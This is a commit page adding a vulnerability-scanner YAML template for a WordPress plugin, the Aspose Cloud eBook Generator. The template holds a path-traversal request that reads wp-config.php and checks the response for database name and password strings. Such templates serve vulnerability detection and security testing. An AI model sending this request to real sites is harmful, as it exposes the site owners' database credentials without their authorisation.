Merge pull request #2903 from Akokonunes/patch-58

Create wp-aspose-cloud-ebook-plugin-file-download.yaml
patch-1
Prince Chaddha 2021-10-17 08:00:55 +05:30 committed by GitHub
commit 7d41f63091
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 27 additions and 0 deletions

View File

@ -0,0 +1,27 @@
id: aspose-file-download
info:
name: Aspose Cloud eBook Generator - File Download
author: 0x_Akoko
severity: high
description: The Aspose Cloud eBook Generator WordPress plugin was affected by a File Download security vulnerability.
reference: https://wpscan.com/vulnerability/7866
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200